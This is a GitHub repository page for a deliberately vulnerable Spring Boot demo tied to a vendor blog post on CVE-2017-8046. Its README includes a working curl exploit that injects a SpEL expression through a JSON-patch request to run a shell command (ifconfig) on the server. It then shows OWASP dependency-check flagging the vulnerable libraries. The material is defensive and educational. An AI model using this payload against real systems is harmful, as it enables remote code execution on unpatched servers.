Skip to content

bkhablenko/CVE-2017-8046

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
src/main
src/main
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
pom.xml
pom.xml
 
 

Repository files navigation

VGS Logo

DISCLAIMER: This repository is supplementary to the VGS blog post, How to Avoid "Using Components with Known Vulnerabilities". It contains an application with a known security vulnerability (namely, CVE-2017-8046), as well as the description of how to exploit it. Use the application at your own risk!

Setting Up

First, start the application by executing the following command from the root of the repository:

mvn clean spring-boot:run

Second, create a resource by sending a POST request like this:

curl -X POST http://localhost:8080/books \
  -H 'Content-Type: application/json' \
  -d '{"isbn":"978-3827268969","title":"Thinking in Java","author":"Bruce Eckel"}'

Exploiting the Vulnerability

curl -X PATCH http://localhost:8080/books/1 -H 'Content-Type: application/json-patch+json' -d '[{"op":"replace","path":"T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec(\"ifconfig\").getInputStream(),T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x","value":"Your application has been hacked"}]'

Provided you're running the application on a Unix-based operation system (e.g. macOS), a response will contain the host's network configuration. In fact, any SpEL expression can be used.

Checking Vulnerable Dependencies

mvn clean package verify

The build will fail as there's a dependency identified with a high-risk vulnerability:

[ERROR] Failed to execute goal org.owasp:dependency-check-maven:3.3.2:check (default) on project CVE-2017-8046:
[ERROR]
[ERROR] One or more dependencies were identified with vulnerabilities that have a CVSS score greater than or equal to '7.0':
[ERROR]
[ERROR] spring-boot-1.5.5.RELEASE.jar: CVE-2017-8046
[ERROR] spring-core-4.3.10.RELEASE.jar: CVE-2018-1275, CVE-2018-1270
[ERROR] jackson-databind-2.8.9.jar: CVE-2017-15095, CVE-2017-17485, CVE-2018-7489
[ERROR] spring-boot-starter-data-rest-1.5.5.RELEASE.jar: CVE-2018-1273, CVE-2017-8046
[ERROR]
[ERROR] See the dependency-check report for more details.

What is VGS?

Want to just jump right in? Check out our getting started guide.

Very Good Security (VGS) allows you to enhance your security standing while maintaining the utility of your data internally and with third-parties. As an added benefit, we accelerate your compliance certification process and help you quickly obtain security-related compliances that stand between you and your market opportunities.

To learn more, visit us at https://www.verygoodsecurity.com/

License

This project is licensed under the MIT license. See the LICENSE file for details.

About

No description, website, or topics provided.

Resources

Readme

License

MIT license
Activity

Stars

0 stars

Watchers

0 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages